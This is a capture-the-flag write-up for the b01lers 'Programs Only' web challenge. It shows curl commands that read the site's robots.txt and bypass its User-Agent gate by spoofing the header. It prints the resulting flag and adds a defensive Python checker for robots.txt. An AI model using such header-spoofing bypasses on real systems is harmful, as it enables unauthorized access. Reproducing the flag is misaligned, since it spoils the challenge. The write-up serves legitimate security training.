b01lers CTF bootcamp - Writeup (web : Programs Only)
Web
Programs Only!
You don't have to be lonely at Programs Only dot com http://chal.ctf.b01lers.com:3003
Access the specified URL.
kali@kali:~/Desktop$ curl http://chal.ctf.b01lers.com:3003/
<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Welcome.</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="stylesheet" href="/static/css/tron.css" />
    <link rel="stylesheet" href="/static/css/style.css" />
  </head>
  <body style="background-color: black">
    <div id="main-wrapper">
      <div class="content-page">
        <div>
          <h1>Welcome 'curl/7.68.0' to The Grid.</h1>
        </div>
      </div>
      <div class="horizontal_wrapper">
        <div>
          <a href="/tron_city">
            <h2>Tron City</h2>
            <img src="/static/img/tron_city.jpg" alt="tron city" />
          </a>
        </div>
        <div>
          <a href="/sea_of_simulation">
            <h2>Sea of Simulation</h2>
            <img src="/static/img/SeaofSim01.webp" alt="sea_of_simulation" />
          </a>
        </div>
      </div>
      <div class="horizontal_wrapper">
        <div>
          <a href="/disc_arena">
            <h2>Disc Arena</h2>
            <img src="/static/img/disc_war.png" alt="disc arena" />
            <!-- from: https://www.deviantart.com/thepr0crastin80r/art/Tron-Legacy-SFM-Disc-Battle-737958125&psig=AOvVaw3jD_KhH4MDPoqSCBxj_OVH&ust=1600969105064000&source=images&cd=vfe&ved=0CA0QjhxqFwoTCMjv3_Lo_-sCFQAAAAAdAAAAABAD -->
          </a>
        </div>
        <div>
          <a href="/0001001_club">
            <h2>0001001 Club</h2>
            <img src="/static/img/0001001_Club.webp" alt="0001001 Club" />
          </a>
        </div>
      </div>
      <div class="horizontal_wrapper">
        <div>
          <a href="/portal">
            <h2>Portal</h2>
            <img src="/static/img/portal.webp" alt="portal" />
          </a>
        </div>
        <!--
        <div>
          <a href="/program">
            <h2>Program's Only</h2>
            <img src="/static/img/programs_only.jpg" alt="00101010" />
          </a>
        </div>
        -->
      </div>
    </div>
  </body>
</html>
The page dynamically displays the User-Agent of the client that accessed it.
Checking robots.txt shows the following entries.
kali@kali:~/Desktop$ curl http://chal.ctf.b01lers.com:3003/robots.txt
User-agent: *
Disallow: /
User-agent: Program
Allow: /program/
User-agent: Master Control Program 0000
Allow: /program/control
Accessing the URL listed in robots.txt with the User-Agent listed there displays a page containing the flag.
kali@kali:~/Desktop$ curl -H "User-Agent: Master Control Program 0000" http://chal.ctf.b01lers.com:3003/program/control
<!DOCTYPE html>
<html>
  <head>
    <title>Master Control.</title>
    <link rel="stylesheet" href="/static/css/tron.css" />
    <link rel="stylesheet" href="/static/css/style.css" />
  </head>
  <body>
    <div id="main-wrapper">
      <div class="content-page">
        <div>
          <h1>Master Control.</h1>
        </div>
        <div>
          <p>flag{who_programmed_you?} </p>
        </div>
      </div>
    </div>
  </body>
</html>
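The robots.txt in this challenge publishes which User-Agent string is expected on which path, and that header is chosen by the client, so it cannot serve as an access control. The following is an added example, not part of the original writeup: a Python check a site owner could run against their own robots.txt to list such entries. The function names parse_groups and disclosed_paths are hypothetical, and the sample input is the file shown in the curl output above.

```python
# Added example: list robots.txt entries that reveal User-Agent-gated paths.
# Sample input: the robots.txt returned by the challenge server on this page.
ROBOTS_TXT = """\
User-agent: *
Disallow: /
User-agent: Program
Allow: /program/
User-agent: Master Control Program 0000
Allow: /program/control
"""


def parse_groups(text):
    """Return {user_agent: [(directive, path), ...]} using robots.txt grouping."""
    groups, current, reading_agents = {}, [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not reading_agents:            # a rule line ended the previous group
                current = []
            reading_agents = True
            current.append(value)
            groups.setdefault(value, [])
        elif field in ("allow", "disallow") and current:
            reading_agents = False
            for agent in current:
                groups[agent].append((field, value))
    return groups


def disclosed_paths(groups):
    """(agent, path) pairs allowed to a named agent but disallowed for '*'."""
    blocked = [p for d, p in groups.get("*", []) if d == "disallow" and p]
    findings = []
    for agent, rules in groups.items():
        if agent == "*":
            continue
        for directive, path in rules:
            if directive == "allow" and any(path.startswith(b) for b in blocked):
                findings.append((agent, path))
    return findings


if __name__ == "__main__":
    for agent, path in disclosed_paths(parse_groups(ROBOTS_TXT)):
        print(f"review: {path!r} is advertised for User-Agent {agent!r}")
```

Any path this reports needs server-side authentication and authorization, because both robots.txt and the User-Agent header are readable and settable by any client.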